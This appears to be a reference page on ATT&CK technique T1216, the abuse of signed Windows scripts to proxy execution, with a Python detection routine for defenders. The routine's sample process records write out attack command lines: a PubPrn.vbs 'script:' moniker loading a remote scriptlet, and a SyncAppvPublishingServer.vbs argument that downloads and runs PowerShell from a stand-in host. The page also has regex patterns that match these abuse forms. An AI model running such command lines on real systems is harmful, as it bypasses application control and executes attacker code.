Stealth

T1216: System Script Proxy Execution

T1216 · Technique · 1 platform

Description

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft-signed scripts, either downloaded from Microsoft or present by default on Windows installations, can be used to proxy execution of other files.(Citation: LOLBAS Project) Because the script itself is signed and ships with the operating system, an adversary can abuse it to execute malicious files in a way that bypasses application control and signature validation on the system: the allow-listed, signed script is what launches, and it in turn loads the adversary's payload.(Citation: GitHub Ultimate AppLocker Bypass List)

Platforms

Windows

Sub-Techniques (2)

T1216.001: PubPrn (cscript.exe/wscript.exe running PubPrn.vbs)
T1216.002: SyncAppvPublishingServer (cscript.exe/wscript.exe running SyncAppvPublishingServer.vbs)

Mitigations (1)

M1038: Execution Prevention

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

References

LOLBAS Project: https://lolbas-project.github.io/
GitHub Ultimate AppLocker Bypass List: https://github.com/api0cradle/UltimateAppLockerByPassList

Frequently Asked Questions

What is T1216 (System Script Proxy Execution)?

T1216 is the MITRE ATT&CK technique named 'System Script Proxy Execution'. This site groups it under Stealth; in ATT&CK itself it belongs to the Defense Evasion tactic. Adversaries use trusted scripts, often signed with certificates, to proxy the execution of malicious files: several Microsoft-signed scripts, either downloaded from Microsoft or present by default on Windows installations, can be made to launch other files, and because the signed script is what executes, the payload can slip past application control and signature validation.

How can T1216 be detected?

Detection of T1216 (System Script Proxy Execution) relies on process creation, command execution and script execution telemetry (for example Security event 4688 with command-line auditing enabled, or Sysmon Event ID 1). Monitor script hosts such as cscript.exe and wscript.exe and their command lines for invocations of the signed scripts that can proxy execution, notably PubPrn.vbs and SyncAppvPublishingServer.vbs, the two tracked as sub-techniques, and record the parent process and any files or URLs passed as arguments. Compare recent invocations against the prior history of known-good arguments and executed binaries on that host: a script that is normally run only from an administrative tool, or one whose arguments reference a remote URL or embed additional commands, is anomalous and warrants investigation.
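The detection described above, as an added example that is not code from MITRE ATT&CK or the LOLBAS project: a small Python triage routine that runs over constructed process-creation records (field names mimic Sysmon Event ID 1 / Security 4688) and flags cscript.exe or wscript.exe launching the two signed scripts ATT&CK tracks as sub-techniques. It raises the severity when the script's argument takes the shape LOLBAS documents as abuse: a script: moniker handed to PubPrn.vbs, or a ; or | followed by extra PowerShell for SyncAppvPublishingServer.vbs. The process paths, the parent process names and the example.invalid URLs are constructed sample data.

```python
"""Triage process-creation events for signed-script proxy execution (T1216).

Added example; this is not code from MITRE ATT&CK or the LOLBAS project.
The records below are constructed to resemble Sysmon Event ID 1 / Security
4688 fields, and the abuse argument shapes are the ones LOLBAS documents for
the two scripts ATT&CK tracks as sub-techniques of T1216.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Script hosts that run .vbs files; the signed script is just an argument to them.
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}

# Script basename -> regex for the argument shape LOLBAS documents as abuse.
PROXY_SCRIPTS = {
    # PubPrn.vbs hands its second argument to GetObject(); a "script:" moniker
    # loads and runs a COM scriptlet (.sct), which may live on a remote server.
    "pubprn.vbs": re.compile(r"\bscript:\S+", re.IGNORECASE),
    # SyncAppvPublishingServer.vbs splices its argument into a PowerShell
    # command line, so ';' or '|' lets the caller append arbitrary PowerShell.
    "syncappvpublishingserver.vbs": re.compile(r"[;|].+"),
}


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(ev: ProcEvent) -> Optional[dict]:
    """Return a finding for one event, or None when it is not a script host
    invoking one of the proxy-capable signed scripts."""
    if basename(ev.image) not in SCRIPT_HOSTS:
        return None
    lowered = ev.command_line.lower()
    for script, abuse in PROXY_SCRIPTS.items():
        pos = lowered.find(script)
        if pos == -1:
            continue
        # Only text after the script's own path can be an argument to the script.
        args = ev.command_line[pos + len(script):]
        finding = {
            "script": script,
            "parent": basename(ev.parent_image),
            "command_line": ev.command_line,
        }
        match = abuse.search(args)
        if match:
            finding["severity"] = "high"
            finding["detail"] = "argument shape documented as abuse: " + match.group(0)
        else:
            # Any invocation is worth inventorying: compare parent, arguments and
            # frequency against the host's known-good history before dismissing it.
            finding["severity"] = "low"
            finding["detail"] = "proxy-capable signed script invoked; baseline against known-good use"
        return finding
    return None


def triage(events: List[ProcEvent]) -> List[dict]:
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed sample records (not captured from a real host; example.invalid is a reserved name).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cscript.exe",
              r'cscript.exe "C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs" printserver01',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cscript.exe",
              r"cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://example.invalid/payload.sct",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'''wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('https://example.invalid/p.ps1') | IEX"''',
              r"C:\Users\alice\AppData\Local\Temp\setup.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -c whoami",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['script']} (parent {f['parent']}): {f['detail']}")
```

The low-severity path is deliberate: a legitimate administrator running PubPrn.vbs against a print server looks identical at the process level, so the routine records every invocation and leaves the known-good comparison (parent, arguments, frequency per host) to whoever tunes it, rather than alerting only on the argument shapes it already knows.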

What mitigations exist for T1216?

There is one documented mitigation for T1216: Execution Prevention (M1038). Where the signed scripts that can proxy execution are not needed on a given system or network, configure application control to block them.

Which threat groups use T1216?

Attribution varies by campaign; check the MITRE ATT&CK entry for T1216 and its sub-techniques for current group and software usage.